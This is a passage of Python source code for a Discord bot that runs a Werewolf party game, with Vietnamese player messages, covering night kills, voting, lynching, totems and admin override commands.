Nếu là " "thợ săn, <player> sẽ chết tối hôm sau.```") async def cmd_kill(message, parameters): if not session[0] or message.author.id not in session[1] or get_role(message.author.id, 'role') not in COMMANDS_FOR_ROLE['kill'] or not session[1][message.author.id][0]: return if session[2]: await reply(message, "Chỉ có thể giết vào ban đêm.") return if parameters == "": await reply(message, roles[session[1][message.author.id][1]][2]) else: if get_role(message.author.id, 'role') == 'hunter': if 'hunterbullet' not in session[1][message.author.id][4]: await reply(message, "Bạn đã giết 1 người trong game này rồi.") return elif session[1][message.author.id][2] not in ['', message.author.id]: await reply(message, "Bạn đã chọn giết **{}** rồi.".format(get_name(session[1][message.author.id][2]))) return player = get_player(parameters) if player: if player == message.author.id: await reply(message, "Tau éo cho mầy tự tử đâu.") elif roles[get_role(message.author.id, 'role')][0] == 'wolf' and player in \ [x for x in session[1] if roles[get_role(x, 'role')][0] == 'wolf' and get_role(x, 'role') != 'cultist']: await reply(message, "Rảnh háng quá đi bóp dái đồng đội à?.") elif player in [x for x in session[1] if not session[1][x][0]]: await reply(message, "Người chơi **" + get_name(player) + "** chết rồi!") else: session[1][message.author.id][2] = player if roles[get_role(message.author.id, 'role')][0] == 'wolf': await reply(message, "Đã chọn giết **" + get_name(player) + "**.") await wolfchat("**{}** đã bầu giết **{}**.".format(get_name(message.author.id), get_name(player))) elif get_role(message.author.id, 'role') == 'hunter': await reply(message, "Bạn đã chọn giết **" + get_name(player) + "**.") await log(1, "{0} ({1}) KILL {2} ({3})".format(get_name(message.author.id), message.author.id, get_name(player), player)) else: await reply(message, "Không tìm thấy người chơi " + parameters) @cmd('vote', [0, 0], "```\n{0}vote [<gamemode | player>]\n\nVotes for <gamemode> during the join phase or votes to lynch <player> during the day. If no arguments " "are given, replies with a list of current votes.```", 'v') async def cmd_vote(message, parameters): if session[0]: await cmd_lynch(message, parameters) else: if message.channel.is_private: await reply(message, "Hãy vote ở phòng chơi.") return if parameters == "": await cmd_votes(message, parameters) else: if session[6]: await reply(message, "Một Admin đã set chế độ chơi rồi.") return if message.author.id in session[1]: choice, num = _autocomplete(parameters, gamemodes) if num == 0: await reply(message, "Không tìm thấy {}".format(parameters)) elif num == 1: session[1][message.author.id][2] = choice await reply(message, "bạn đã chọn chế độ chơi **{}**.".format(choice)) else: await reply(message, "Multiple options: {}".format(', '.join(sorted(choice)))) else: await reply(message, "Bạn không thể bầu nếu bạn không chơi!") @cmd('lynch', [0, 0], "```\n{0}lynch [<player>]\n\nbầu treo cổ [<player>] vào ban ngày. 
Nếu không có ai được nêu, sẽ cho danh sách votes.```") async def cmd_lynch(message, parameters): if not session[0] or not session[2]: return if parameters == "": await cmd_votes(message, parameters) else: if message.author.id not in session[1]: return if message.channel.is_private: await reply(message, "Hãy xài lệnh treo cổ ở phòng chơi.") return if 'injured' in session[1][message.author.id][4]: await reply(message, "Bạn đang chấn thương và không vote được.") return to_lynch = get_player(parameters.split(' ')[0]) if not to_lynch: to_lynch = get_player(parameters) if to_lynch: if to_lynch in [x for x in session[1] if not session[1][x][0]]: await reply(message, "Người chơi **" + get_name(to_lynch) + "** chết rồi!") else: session[1][message.author.id][2] = to_lynch await reply(message, "Bạn đã bầu chọn treo cổ **" + get_name(to_lynch) + "**.") await log(1, "{0} ({1}) LYNCH {2} ({3})".format(get_name(message.author.id), message.author.id, get_name(to_lynch), to_lynch)) else: await reply(message, "Không tìm thấy người chơi " + parameters) @cmd('votes', [0, 0], "```\n{0}votes không cần thêm cú pháp\n\nHiện thị gamemode đang bầu hoặc trạng thái vote treo cổ của ngày hôm nay.```") async def cmd_votes(message, parameters): if not session[0]: vote_dict = {'start' : []} for player in session[1]: if session[1][player][2] in vote_dict: vote_dict[session[1][player][2]].append(player) elif session[1][player][2] != '': vote_dict[session[1][player][2]] = [player] if session[1][player][1] == 'start': vote_dict['start'].append(player) reply_msg = "**{}** người chơi{} ở trong sảnh, **{}** phiếu bầu{} cần thiết để chọn chế độ chơi, **{}** phiếu bầu cần để bắt đầu game.```\n".format( len(session[1]), '' if len(session[1]) == 1 else 's', len(session[1]) // 2 + 1, '' if len(session[1]) // 2 + 1 == 1 else 's', max(2, min(len(session[1]) // 4 + 1, 4))) for gamemode in vote_dict: if gamemode == 'start': continue reply_msg += "{} ({} vote{}): {}\n".format(gamemode, len(vote_dict[gamemode]), '' if len(vote_dict[gamemode]) == 1 else 's', ', '.join(map(get_name, vote_dict[gamemode]))) reply_msg += "{} vote{} để bắt đầu: {}\n```".format(len(vote_dict['start']), '' if len(vote_dict['start']) == 1 else 's', ', '.join(map(get_name, vote_dict['start']))) await reply(message, reply_msg) elif session[0] and session[2]: vote_dict = {'abstain': []} alive_players = [x for x in session[1] if session[1][x][0]] able_voters = [x for x in alive_players if 'injured' not in session[1][x][4]] for player in able_voters: if session[1][player][2] in vote_dict: vote_dict[session[1][player][2]].append(player) elif session[1][player][2] != '': vote_dict[session[1][player][2]] = [player] abstainers = vote_dict['abstain'] reply_msg = "**{}** người chơi còn sống, **{}** phiếu bầu để treo cổ, **{}** người chơi có thể bầu, **{}** người chơi{} bỏ phiếu trắng.\n".format( len(alive_players), len(able_voters) // 2 + 1, len(able_voters), len(abstainers), '' if len(abstainers) == 1 else 's') if len(vote_dict) == 1 and vote_dict['abstain'] == []: reply_msg += "Chưa ai đưa phiếu bầu cả. Xài `{}lynch <player>` trong chat để treo cổ <player>. 
".format(BOT_PREFIX, client.get_channel(GAME_CHANNEL).name) else: reply_msg += "Đang vote: ```\n" for voted in [x for x in vote_dict if x != 'abstain']: reply_msg += "{} ({}) ({} vote{}): {}\n".format( get_name(voted), voted, len(vote_dict[voted]), '' if len(vote_dict[voted]) == 1 else 's', ', '.join(['{} ({})'.format(get_name(x), x) for x in vote_dict[voted]])) reply_msg += "{} vote{} phiếu trắng: {}\n".format( len(vote_dict['abstain']), '' if len(vote_dict['abstain']) == 1 else 's', ', '.join(['{} ({})'.format(get_name(x), x) for x in vote_dict['abstain']])) reply_msg += "```" await reply(message, reply_msg) @cmd('retract', [0, 0], "```\n{0}retract không cần thêm cú pháp\n\nRút lại phiếu bầu hoặc quyết định của bạn " "khi là vai đặc biệt.```", 'r') async def cmd_retract(message, parameters): if message.author.id not in session[1]: # not playing return if not session[0] and session[1][message.author.id][2] == '' and session[1][message.author.id][1] == '': # no vote to start nor vote for gamemode return if session[0] and session[1][message.author.id][2] == '': # no target return if not session[0]: if message.channel.is_private: await reply(message, "Hãy xài lệnh ở game channel.") return session[1][message.author.id][2] = '' session[1][message.author.id][1] = '' await reply(message, "Bạn đã rút lại phiếu bầu.") elif session[0] and session[1][message.author.id][0]: if session[2]: if message.channel.is_private: await reply(message, "Hãy xài lệnh retract trong game channel.") return session[1][message.author.id][2] = '' await reply(message, "Bạn đã rút lại phiếu bầu.") await log(1, "{0} ({1}) RETRACT VOTE".format(get_name(message.author.id), message.author.id)) else: if session[1][message.author.id][1] in ACTUAL_WOLVES: if not message.channel.is_private: try: await client.send_message(message.author, "Xài lệnh retract trong chat riêng với bot.") except: pass return session[1][message.author.id][2] = '' await reply(message, "Bạn đã rút lại quyết định.") await wolfchat("**{}** đã rút lại quyết định giết.".format(get_name(message.author.id))) await log(1, "{0} ({1}) RETRACT KILL".format(get_name(message.author.id), message.author.id)) @cmd('abstain', [0, 2], "```\n{0}abstain không cần thêm cú pháp\n\nBỏ phiếu trắng cho hôm nay.```", 'abs', 'nl') async def cmd_abstain(message, parameters): if not session[0] or not session[2] or not message.author.id in [x for x in session[1] if session[1][x][0]]: return if session[4][1] == timedelta(0): await client.send_message(client.get_channel(GAME_CHANNEL), "Dân làng không thể bỏ phiếu trắng vào ngày đầu tiên. :joy:") return session[1][message.author.id][2] = 'abstain' await log(1, "{0} ({1}) ABSTAIN".format(get_name(message.author.id), message.author.id)) await client.send_message(client.get_channel(GAME_CHANNEL), "**{}** đã chọn không treo ai hôm nay.".format(get_name(message.author.id))) @cmd('coin', [0, 0], "```\n{0}coin takes no arguments\n\nFlips a coin. 
Don't use this for decision-making, especially not for life or death situations.```") async def cmd_coin(message, parameters): value = random.randint(1,100) reply_msg = '' if value == 1: reply_msg = 'its side' elif value == 100: reply_msg = client.user.name elif value < 50: reply_msg = 'heads' else: reply_msg = 'tails' await reply(message, 'The coin landed on **' + reply_msg + '**!') @cmd('admins', [0, 0], "```\n{0}admins Không cần thêm cú pháp\n\nĐưa danh sách admin đang online nếu xài trong chat riêng với bot, và **báo động** cho các admin nếu xài trong game channel (**USE ONLY WHEN NEEDED**).```") async def cmd_admins(message, parameters): await reply(message, 'Admin đang online: ' + ', '.join(['<@{}>'.format(x) for x in ADMINS if is_online(x)])) @cmd('fday', [1, 2], "```\n{0}fday takes no arguments\n\nForces night to end.```") async def cmd_fday(message, parameters): if session[0] and not session[2]: session[2] = True await reply(message, ":thumbsup:") await log(2, "{0} ({1}) FDAY".format(message.author.name, message.author.id)) @cmd('fnight', [1, 2], "```\n{0}fnight takes no arguments\n\nForces day to end.```") async def cmd_fnight(message, parameters): if session[0] and session[2]: session[2] = False await reply(message, ":thumbsup:") await log(2, "{0} ({1}) FNIGHT".format(message.author.name, message.author.id)) @cmd('frole', [1, 2], "```\n{0}frole <player> <role>\n\nSets <player>'s role to <role>.```") async def cmd_frole(message, parameters): if parameters == '': return player = parameters.split(' ')[0] role = parameters.split(' ', 1)[1] temp_player = get_player(player) if temp_player: if session[0]: if role in roles or role in ['cursed']: if role not in ['cursed'] + TEMPLATES_ORDERED: session[1][temp_player][1] = role if role == 'cursed villager': session[1][temp_player][1] = 'villager' for i in range(session[1][temp_player][3].count('cursed')): session[1][temp_player][3].remove('cursed') session[1][temp_player][3].append('cursed') elif role == 'cursed': for i in range(session[1][temp_player][3].count('cursed')): session[1][temp_player][3].remove('cursed') session[1][temp_player][3].append('cursed') elif role in TEMPLATES_ORDERED: for i in range(session[1][temp_player][3].count(role)): session[1][temp_player][3].remove(role) session[1][temp_player][3].append(role) await reply(message, "Successfully set **{}**'s role to **{}**.".format(get_name(temp_player), role)) else: await reply(message, "Cannot find role named **" + role + "**") else: session[1][temp_player][1] = role else: await reply(message, "Cannot find player named **" + player + "**") await log(2, "{0} ({1}) FROLE {2}".format(message.author.name, message.author.id, parameters)) @cmd('force', [1, 2], "```\n{0}force <player> <target>\n\nSets <player>'s target flag (session[1][player][2]) to <target>.```") async def cmd_force(message, parameters): if parameters == '': await reply(message, commands['force'][2].format(BOT_PREFIX)) return player = parameters.split(' ')[0] target = ' '.join(parameters.split(' ')[1:]) temp_player = get_player(player) if temp_player: session[1][temp_player][2] = target await reply(message, "Successfully set **{}**'s target to **{}**.".format(get_name(temp_player), target)) else: await reply(message, "Cannot find player named **" + player + "**") await log(2, "{0} ({1}) FORCE {2}".format(message.author.name, message.author.id, parameters)) @cmd('session', [1, 1], "```\n{0}session takes no arguments\n\nReplies with the contents of the session variable in pm for debugging purposes. 
Admin only.```")
async def cmd_session(message, parameters):
    await client.send_message(message.author, "```py\n{}\n```".format(str(session)))
    await log(2, "{0} ({1}) SESSION".format(message.author.name, message.author.id))

@cmd('time', [0, 0], "```\n{0}time không cần thêm cú pháp\n\nXem thời gian trong game.```", 't')
async def cmd_time(message, parameters):
    if session[0]:
        seconds = 0
        timeofday = ''
        sunstate = ''
        if session[2]:
            seconds = DAY_TIMEOUT - (datetime.now() - session[3][1]).seconds
            timeofday = 'buổi sáng'
            sunstate = 'hoàng hôn'
        else:
            seconds = NIGHT_TIMEOUT - (datetime.now() - session[3][0]).seconds
            timeofday = 'buổi tối'
            sunstate = 'bình minh'
        await reply(message, "Bây giờ là **{0}**. Có **{1:02d}:{2:02d}** tới khi {3}.".format(timeofday, seconds // 60, seconds % 60, sunstate))
    else:
        if len(session[1]) > 0:
            timeleft = GAME_START_TIMEOUT - (datetime.now() - session[5]).seconds
            await reply(message, "Còn **{0:02d}:{1:02d}** tới khi game tự hủy. :cry:\n"
                                 "GAME_START_TIMEOUT is currently set to **{2:02d}:{3:02d}**.".format(
                                     timeleft // 60, timeleft % 60, GAME_START_TIMEOUT // 60, GAME_START_TIMEOUT % 60))

@cmd('give', [2, 0], "```\n{0}give <player>\n\nNếu là thầy bùa, đưa bùa cho <player>. Bạn có thể xem bùa mình đang giữ bằng lệnh `myrole` trong chat riêng với bot.```")
async def cmd_give(message, parameters):
    if not session[0] or message.author.id not in session[1] or session[1][message.author.id][1] not in ['shaman', 'crazed shaman'] or not session[1][message.author.id][0]:
        return
    if session[2]:
        await reply(message, "Bạn chỉ có thể đưa bùa chú vào ban đêm.")
        return
    if session[1][message.author.id][2] not in totems:
        await reply(message, "Bạn đã đưa bùa chú cho **" + get_name(session[1][message.author.id][2]) + "** rồi!")
    else:
        if parameters == "":
            await reply(message, roles[session[1][message.author.id][1]][2])
        else:
            player = get_player(parameters)
            if player:
                if player in [x for x in session[1] if not session[1][x][0]]:
                    await reply(message, "Người chơi **" + get_name(player) + "** chết rồi!")
                else:
                    totem = session[1][message.author.id][2]
                    session[1][player][4].append(totem)
                    session[1][message.author.id][2] = player
                    await reply(message, "Bạn đã đưa bùa cho **" + get_name(player) + "**. :smiling_imp:")
                    await log(1, "{0} ({1}) GAVE {2} ({3}) {4}".format(get_name(message.author.id), message.author.id,
                                                                       get_name(player), player, totem))
            else:
                await reply(message, "Không tìm thấy người chơi " + parameters)

@cmd('info', [0, 0], "```\n{0}info không cần thêm cú pháp\n\nCho thông tin cách hoạt động của game.```")
async def cmd_info(message, parameters):
    msg = "Trong trò chơi, có 2 phe, dân làng và ma sói. Dân làng cố gắng giết hết sói, ngược lại sói cố gắng ăn hết dân làng.\n"
    msg += "Có 2 giai đoạn, đêm và ngày. Vào ban đêm, phe sói chọn 1 nạn nhân để giết, và các dân làng có chức năng đặc biệt như tiên tri hoạt động. "
    msg += "Vào ban ngày, dân làng bàn luận với nhau và chọn người để treo cổ. "
    msg += "Khi bạn đã chết, bạn không thể chat ở channel game nhưng có thể chat ở các channel Musik, Off-topic và Spectate.\n\n"
    msg += "Để tham gia game, dùng lệnh `{0}join`. Nếu bạn không chat được ở channel game, thì bạn đã chết hoặc có 1 game đang diễn ra.\n"
    msg += "Để xem danh sách các vai, xài lệnh `{0}roles`. Để biết chi tiết của 1 vai, xài `{0}role <vai>`. Để xem diễn biến của game, xài `{0}stats`. "
    msg += "Để xem danh sách các lệnh, xài `{0}list`. Để có chi tiết về mỗi lệnh, xài `{0}help <lệnh>`. 
Để xem thời gian trong game, xài `{0}time`.\n\n"
    msg += "Hãy cho Lucifer biết các lỗi mà các bạn gặp phải."
    await reply(message, msg.format(BOT_PREFIX))

@cmd('notify_role', [0, 0], "```\n{0}notify_role [<true|false>]\n\nGives or takes the " + WEREWOLF_NOTIFY_ROLE_NAME + " role.```")
async def cmd_notify_role(message, parameters):
    if not WEREWOLF_NOTIFY_ROLE:
        await reply(message, "Error: Vai " + WEREWOLF_NOTIFY_ROLE_NAME + " không tồn tại, hãy cho Lucifer biết.")
        return
    member = client.get_server(WEREWOLF_SERVER).get_member(message.author.id)
    if not member:
        await reply(message, "You are not in the server!")
        return
    has_role = (WEREWOLF_NOTIFY_ROLE in member.roles)
    if parameters == '':
        has_role = not has_role
    elif parameters in ['true', '+', 'yes']:
        has_role = True
    elif parameters in ['false', '-', 'no']:
        has_role = False
    else:
        await reply(message, commands['notify_role'][2].format(BOT_PREFIX))
        return
    if has_role:
        await client.add_roles(member, WEREWOLF_NOTIFY_ROLE)
        await reply(message, "You will be notified by @" + WEREWOLF_NOTIFY_ROLE.name + ".")
    else:
        await client.remove_roles(member, WEREWOLF_NOTIFY_ROLE)
        await reply(message, "You will not be notified by @" + WEREWOLF_NOTIFY_ROLE.name + ".")

@cmd('ignore', [1, 1], "```\n{0}ignore <add|remove|list> <user>\n\nAdds or removes <user> from the ignore list, or outputs the ignore list.```")
async def cmd_ignore(message, parameters):
    parameters = ' '.join(message.content.strip().split(' ')[1:])
    parameters = parameters.strip()
    global IGNORE_LIST
    if parameters == '':
        await reply(message, commands['ignore'][2].format(BOT_PREFIX))
    else:
        action = parameters.split(' ')[0].lower()
        target = ' '.join(parameters.split(' ')[1:])
        member_by_id = client.get_server(WEREWOLF_SERVER).get_member(target.strip('<@!>'))
        member_by_name = client.get_server(WEREWOLF_SERVER).get_member_named(target)
        member = None
        if member_by_id:
            member = member_by_id
        elif member_by_name:
            member = member_by_name
        if action not in ['+', 'add', '-', 'remove', 'list']:
            await reply(message, "Error: invalid flag `" + action + "`. 
Supported flags are add, remove, list") return if not member and action != 'list': await reply(message, "Error: could not find target " + target) return if action in ['+', 'add']: if member.id in IGNORE_LIST: await reply(message, member.name + " is already in the ignore list!") else: IGNORE_LIST.append(member.id) await reply(message, member.name + " was added to the ignore list.") elif action in ['-', 'remove']: if member.id in IGNORE_LIST: IGNORE_LIST.remove(member.id) await reply(message, member.name + " was removed from the ignore list.") else: await reply(message, member.name + " is not in the ignore list!") elif action == 'list': if len(IGNORE_LIST) == 0: await reply(message, "The ignore list is empty.") else: msg_dict = {} for ignored in IGNORE_LIST: member = client.get_server(WEREWOLF_SERVER).get_member(ignored) msg_dict[ignored] = member.name if member else "<user not in server with id " + ignored + ">" await reply(message, str(len(IGNORE_LIST)) + " ignored users:\n```\n" + '\n'.join([x + " (" + msg_dict[x] + ")" for x in msg_dict]) + "```") else: await reply(message, commands['ignore'][2].format(BOT_PREFIX)) await log(2, "{0} ({1}) IGNORE {2}".format(message.author.name, message.author.id, parameters)) # TODO async def cmd_pingif(message, parameters): global pingif_dict if parameters == '': if message.author.id in pingif_dict: await reply(message, "You will be notified when there are at least **{}** players.".format(pingif_dict[message.author.id])) else: await reply(message, "You have not set a pingif yet. `{}pingif <number of players>`".format(BOT_PREFIX)) elif parameters.isdigit(): num = int(parameters) if num in range(MIN_PLAYERS, MAX_PLAYERS + 1): pingif_dict[message.author.id] = num await reply(message, "You will be notified when there are at least **{}** players.".format(pingif_dict[message.author.id])) else: await reply(message, "Please enter a number between {} and {} players.".format(MIN_PLAYERS, MAX_PLAYERS)) else: await reply(message, "Please enter a valid number of players to be notified at.") @cmd('online', [1, 1], "```\n{0}online takes no arguments\n\nNotifies all online users.```") async def cmd_online(message, parameters): members = [x.id for x in message.server.members] online = ["<@{}>".format(x) for x in members if is_online(x)] await reply(message, "PING! {}".format(''.join(online))) @cmd('notify', [0, 0], "```\n{0}notify [<true|false>]\n\nNotifies all online users who want to be notified, or adds/removes you from the notify list.```") async def cmd_notify(message, parameters): if session[0]: return notify = message.author.id in notify_me if parameters == '': online = ["<@{}>".format(x) for x in notify_me if is_online(x) and x not in session[1]] await reply(message, "PING! 
{}".format(''.join(online))) elif parameters in ['true', '+', 'yes']: if notify: await reply(message, "Bạn đã ở trong danh sách sẽ được thông báo rồi.") return notify_me.append(message.author.id) await reply(message, "Bạn sẽ được thông báo khi có game bởi {}notify.".format(BOT_PREFIX)) elif parameters in ['false', '-', 'no']: if not notify: await reply(message, "Bạn không nằm trong danh sách được thông báo.") return notify_me.remove(message.author.id) await reply(message, "Bạn sẽ không được thông báo bởi {}notify.".format(BOT_PREFIX)) else: await reply(message, commands['notify'][2].format(BOT_PREFIX)) @cmd('getrole', [1, 1], "```\n{0}getrole <player> <revealtype>\n\nTests get_role command.```") async def cmd_getrole(message, parameters): if not session[0] or parameters == '': await reply(message, commands['getrole'][2].format(BOT_PREFIX)) return player = parameters.split(' ')[0] revealtype = ' '.join(parameters.split(' ')[1:]) temp_player = get_player(player) if temp_player: role = get_role(temp_player, revealtype) await reply(message, "**{}** is a **{}** using revealtype **{}**".format(get_name(temp_player), role, revealtype)) else: await reply(message, "Cannot find player named **" + player + "**") @cmd('visit', [2, 0], "```\n{0}visit <player>\n\nNếu là Harlot, ghé thăm <player>. Bạn có thể ở nhà bằng cách thăm chính mình. " "Bạn sẽ chết nếu thăm 1 con sói hoặc thăm nạn nhân 1 con sói.```") async def cmd_visit(message, parameters): if not session[0] or message.author.id not in session[1] or session[1][message.author.id][1] != 'harlot' or not session[1][message.author.id][0]: return if session[2]: await reply(message, "Chỉ có thể ghé thăm vào ban đêm.") return if session[1][message.author.id][2]: await reply(message, "Bạn đã đang ngủ với **{}** rồi!.:cry:".format(get_name(session[1][message.author.id][2]))) else: if parameters == "": await reply(message, roles[session[1][message.author.id][1]][2]) else: player = get_player(parameters) if player: if player == message.author.id: await reply(message, "Bạn đã chọn ở nhà.") session[1][message.author.id][2] = message.author.id await log(1, "{0} ({1}) STAY HOME".format(get_name(message.author.id), message.author.id)) elif player in [x for x in session[1] if not session[1][x][0]]: await reply(message, "Player **" + get_name(player) + "** is dead!") else: await reply(message, "Bạn đang ngủ cùng **{}**. Nệm ấm chăn êm :>!".format(get_name(player))) session[1][message.author.id][2] = player member = client.get_server(WEREWOLF_SERVER).get_member(player) try: await client.send_message(member, "Bạn đang ngủ cùng Thúy Kiều. 
**{}** sẽ ở bên bạn cả đêm. Ngủ ngon :>!".format(get_name(message.author.id)))
                    except:
                        pass
                    await log(1, "{0} ({1}) VISIT {2} ({3})".format(get_name(message.author.id), message.author.id,
                                                                    get_name(player), player))
                else:
                    await reply(message, "Không tìm thấy người chơi " + parameters)

@cmd('totem', [0, 0], "```\n{0}totem [<totem>]\n\nCho biết thông tin về 1 lá bùa, hoặc cho danh sách các bùa trong game.```", 'totems')
async def cmd_totem(message, parameters):
    if not parameters == '':
        reply_totems = []
        for totem in totems:
            if totem.startswith(parameters):
                reply_totems.append(totem)
        if _autocomplete(parameters, totems)[1] == 1:
            totem = _autocomplete(parameters, totems)[0]
            reply_msg = "```\n"
            reply_msg += totem[0].upper() + totem[1:].replace('_', ' ') + "\n\n"
            reply_msg += totems[totem] + "```"
            await reply(message, reply_msg)
            return
    await reply(message, "Các bùa đang có: " + ", ".join(sorted([x.replace('_', ' ') for x in totems])))

@cmd('fgame', [1, 2], "```\n{0}fgame [<gamemode>]\n\nForcibly sets or unsets [<gamemode>].```")
async def cmd_fgame(message, parameters):
    if session[0]:
        return
    if parameters == '':
        if session[6] != '':
            session[6] = ''
            await reply(message, "Successfully unset gamemode.")
        else:
            await reply(message, "Gamemode has not been set.")
    else:
        if parameters.startswith('roles'):
            role_string = ' '.join(parameters.split(' ')[1:])
            if role_string == '':
                await reply(message, "`{}fgame roles wolf:1,traitor:1,shaman:2,cursed villager:2,etc.`".format(BOT_PREFIX))
            else:
                session[6] = parameters
                await reply(message, "Successfully set gamemode roles to `{}`".format(role_string))
        else:
            choices, num = _autocomplete(parameters, gamemodes)
            if num == 1:
                session[6] = choices
                await reply(message, "Successfully set gamemode to **{}**.".format(choices))
            elif num > 1:
                await reply(message, "Multiple choices: {}".format(', '.join(sorted(choices))))
            else:
                await reply(message, "Could not find gamemode {}".format(parameters))
    await log(2, "{0} ({1}) FGAME {2}".format(message.author.name, message.author.id, parameters))

@cmd('ftemplate', [1, 2], "```\n{0}ftemplate <player> [<add|remove|set>] [<template1 [template2 ...]>]\n\nManipulates a player's templates.```")
async def cmd_ftemplate(message, parameters):
    if not session[0]:
        return
    if parameters == '':
        await reply(message, commands['ftemplate'][2].format(BOT_PREFIX))
        return
    params = parameters.split(' ')
    player = get_player(params[0])
    if len(params) > 1:
        action = parameters.split(' ')[1]
    else:
        action = ""
    if len(params) > 2:
        templates = parameters.split(' ')[2:]
    else:
        templates = []
    if player:
        reply_msg = "Successfully "
        if action in ['+', 'add', 'give']:
            session[1][player][3] += templates
            reply_msg += "added templates **{0}** to **{1}**."
        elif action in ['-', 'remove', 'del']:
            for template in templates[:]:
                if template in session[1][player][3]:
                    session[1][player][3].remove(template)
                else:
                    templates.remove(template)
            reply_msg += "removed templates **{0}** from **{1}**."
        elif action in ['=', 'set']:
            session[1][player][3] = templates
            reply_msg += "set **{1}**'s templates to **{0}**."
        else:
            reply_msg = "**{1}**'s templates: " + ', '.join(session[1][player][3])
    else:
        reply_msg = "Could not find player {1}."
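    # reply_msg is a str.format template: {0} is filled with the comma-joined
    # template list and {1} with the player's display name (or the raw input
    # when the lookup fails). Hypothetical example: "!ftemplate luci add gunner
    # cursed" would reply "Successfully added templates **gunner, cursed** to
    # **luci**."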
    await reply(message, reply_msg.format(', '.join(templates), get_name(player) if player else params[0]))
    await log(2, "{0} ({1}) FTEMPLATE {2}".format(message.author.name, message.author.id, parameters))

@cmd('fother', [1, 2], "```\n{0}fother <player> [<add|remove|set>] [<other1 [other2 ...]>]\n\nManipulates a player's other flag (totems, traitor).```")
async def cmd_fother(message, parameters):
    if not session[0]:
        return
    if parameters == '':
        await reply(message, commands['fother'][2].format(BOT_PREFIX))
        return
    params = parameters.split(' ')
    player = get_player(params[0])
    if len(params) > 1:
        action = parameters.split(' ')[1]
    else:
        action = ""
    if len(params) > 2:
        others = parameters.split(' ')[2:]
    else:
        others = []
    if player:
        reply_msg = "Successfully "
        if action in ['+', 'add', 'give']:
            session[1][player][4] += others
            reply_msg += "added **{0}** to **{1}**'s other flag."
        elif action in ['-', 'remove', 'del']:
            for other in others[:]:
                if other in session[1][player][4]:
                    session[1][player][4].remove(other)
                else:
                    others.remove(other)
            reply_msg += "removed **{0}** from **{1}**'s other flag."
        elif action in ['=', 'set']:
            session[1][player][4] = others
            reply_msg += "set **{1}**'s other flag to **{0}**."
        else:
            reply_msg = "**{1}**'s other flag: " + ', '.join(session[1][player][4])
    else:
        reply_msg = "Could not find player {1}."
    await reply(message, reply_msg.format(', '.join(others), get_name(player) if player else params[0]))
    await log(2, "{0} ({1}) FOTHER {2}".format(message.author.name, message.author.id, parameters))

@cmd('faftergame', [2, 2], "```\n{0}faftergame <command> [<parameters>]\n\nSchedules <command> to run with [<parameters>] after the next game ends.```")
async def cmd_faftergame(message, parameters):
    if parameters == "":
        await reply(message, commands['faftergame'][2].format(BOT_PREFIX))
        return
    command = parameters.split(' ')[0]
    if command in commands:
        global faftergame
        faftergame = message
        await reply(message, "Command `{}` will run after the next game ends.".format(parameters))
    else:
        await reply(message, "{} is not a valid command!".format(command))

@cmd('uptime', [0, 0], "```\n{0}uptime takes no arguments\n\nChecks the bot's uptime.```")
async def cmd_uptime(message, parameters):
    delta = datetime.now() - starttime
    output = [[delta.days, 'day'], [delta.seconds // 3600, 'hour'],
              [delta.seconds // 60 % 60, 'minute'], [delta.seconds % 60, 'second']]
    for i in range(len(output)):
        if output[i][0] != 1:
            output[i][1] += 's'
    reply_msg = ''
    if output[0][0] != 0:
        reply_msg += "{} {} ".format(output[0][0], output[0][1])
    for i in range(1, len(output)):
        reply_msg += "{} {} ".format(output[i][0], output[i][1])
    reply_msg = reply_msg[:-1]
    await reply(message, "Uptime: **{}**".format(reply_msg))

@cmd('fstasis', [1, 1], "```\n{0}fstasis <player> [<add|remove|set>] [<amount>]\n\nManipulates a player's stasis.```")
async def cmd_fstasis(message, parameters):
    if parameters == '':
        await reply(message, commands['fstasis'][2].format(BOT_PREFIX))
        return
    params = parameters.split(' ')
    player = params[0].strip('<!@>')
    member = client.get_server(WEREWOLF_SERVER).get_member(player)
    name = "user not in server with id " + player
    if member:
        name = member.display_name
    if len(params) > 1:
        action = parameters.split(' ')[1]
    else:
        action = ''
    if len(params) > 2:
        amount = parameters.split(' ')[2]
        if amount.isdigit():
            amount = int(amount)
        else:
            amount = -1
    else:
        amount = -2
    if player.isdigit():
        if action and amount >= -1:
            if amount >= 0:
                if player not in stasis:
                    stasis[player] = 0
                reply_msg = "Successfully "
                if action in ['+', 'add', 'give']:
                    stasis[player] += amount
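                    # Stasis is the number of upcoming games this player must
                    # sit out; run_game() decrements every positive entry by one
                    # when a game starts. Hypothetical example: "!fstasis
                    # 123456789 add 2" benches the player with that ID for the
                    # next two games.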
reply_msg += "increased **{0}** ({1})'s stasis by **{2}**." elif action in ['-', 'remove', 'del']: amount = min(amount, stasis[player]) stasis[player] -= amount reply_msg += "decreased **{0}** ({1})'s stasis by **{2}**." elif action in ['=', 'set']: stasis[player] = amount reply_msg += "set **{0}** ({1})'s stasis to **{2}**." else: if player not in stasis: amount = 0 else: amount = stasis[player] reply_msg = "**{0}** ({1}) is in stasis for **{2}** game{3}." else: reply_msg = "Stasis must be a non-negative integer." else: if player not in stasis: amount = 0 else: amount = stasis[player] reply_msg = "**{0}** ({1}) is in stasis for **{2}** game{3}." else: reply_msg = "Invalid mention/id: {0}." await reply(message, reply_msg.format(name, player, amount, '' if int(amount) == 1 else 's')) await log(2, "{0} ({1}) FSTASIS {2}".format(message.author.name, message.author.id, parameters)) @cmd('gamemode', [0, 0], "```\n{0}gamemode [<gamemode>]\n\nCho biết thông tin về [<gamemode>] hoặc cho danh sách " "các chế độ chơi.```", 'game', 'gamemodes') async def cmd_gamemode(message, parameters): gamemode, num = _autocomplete(parameters, gamemodes) if num == 1 and parameters != '': await reply(message, "```\nGamemode: {}\nPlayers: {}\nDescription: {}\n\nXài lệnh " "`!roles {} table` để xem các vai có trong gamemode này.```".format(gamemode, str(gamemodes[gamemode]['min_players']) + '-' + str(gamemodes[gamemode]['max_players']), gamemodes[gamemode]['description'], gamemode)) else: await reply(message, "Available gamemodes: {}".format(', '.join(sorted(gamemodes)))) @cmd('verifygamemode', [1, 1], "```\n{0}verifygamemode [<gamemode>]\n\nChecks to make sure [<gamemode>] is valid.```", 'verifygamemodes') async def cmd_verifygamemode(message, parameters): if parameters == '': await reply(message, "```\n{}\n```".format(verify_gamemodes())) elif _autocomplete(parameters, gamemodes)[1] == 1: await reply(message, "```\n{}\n```".format(verify_gamemode(_autocomplete(parameters, gamemodes)[0]))) else: await reply(message, "Éo có gamemode: {}".format(parameters)) @cmd('shoot', [0, 2], "```\n{0}shoot <player>\n\nNếu có súng, bắn <player> vào ban ngày, chỉ có thể dùng lệnh này ở khung chat server.```") async def cmd_shoot(message, parameters): if not session[0] or message.author.id 